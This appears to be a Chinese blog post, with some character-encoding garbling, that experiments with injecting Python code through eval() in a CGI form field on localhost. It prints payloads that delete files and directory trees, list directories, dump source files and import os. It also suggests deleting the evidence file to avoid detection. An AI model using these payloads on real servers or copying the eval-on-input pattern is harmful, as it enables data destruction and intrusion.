一般來說Python的eval()函數(shù)可以把字符串“123”變成數(shù)字類型的123，但是PP3E上說它很危險，還可以執(zhí)行其他命令！

對此進行一些試驗。果然，如果python寫的cgi程序中如果使用eval()而非int()來轉(zhuǎn)換諸如年齡這樣的輸入框中的內(nèi)容時是非常危險的。不僅可以看見列出系統(tǒng)的全部文件，還可以執(zhí)行刪除文件，察看文件源代碼等危險操作！

試著寫了個程序，想把本地的腳本文件同過這樣的形式一行一行的寫到服務(wù)器的某個文件里，可最后失敗在無法輸入換行符"/n"，在提交的語句里只要有換行符，就會出現(xiàn)EOL的出錯提示，換了編碼方式還是沒能成功。
 
網(wǎng)頁里有一個提交名字的窗口，這里只是以改它為例，否則名字是不會用eval函數(shù)轉(zhuǎn)換的，不過年齡到是很容易出問題。這個文件（http://localhost/tutor4.html）導(dǎo)入了os。

line1 = "Hello, %s." % eval(form['user'].value)

（1）

os.system('del * /q') #刪除當前目錄下所有文件（不包括文件夾）。

os.system調(diào)用當前系統(tǒng)的命令（如windows）

/q
指定強制狀態(tài)。不提示您確認刪除。

（2）若刪除文件夾，使用rmdir

/s
刪除指定目錄和所有子目錄以及包含的所有文件。使用 /s 來刪除目錄樹。

/q
在安靜模式中運行 rmdir。不經(jīng)確認即刪除目錄。

os.system('rmdir d:/workspace /s/q')

（3）列出所有文件os.system('dir')。因為成功執(zhí)行了dir命令后，系統(tǒng)返回0，所以看到的返回內(nèi)容只能是Hello,0.而在服務(wù)器上，倒是真的列出來了，如果有日志，可能被發(fā)現(xiàn)。提交os.system('dir >dir.txt')，那么訪問http://localhost/dir.txt那么所有的文件和文件夾都暴露了，想看源代碼嗎？如果再使用os.system('type target.py').命令如果成功完成同樣會返回Hello, 0.的。難道再放進一個文件，再訪問那個文件嗎？open('target.py').read()

由此，可以在列出和察看其他文件夾里面的內(nèi)容了。

如果沒干別的壞事，那么可刪除dir.txt以免被人發(fā)現(xiàn)了。os.system('del dir.txt /q')

導(dǎo)入os并執(zhí)行命令：

__import__('os').system('dir >dir.txt')

最新評論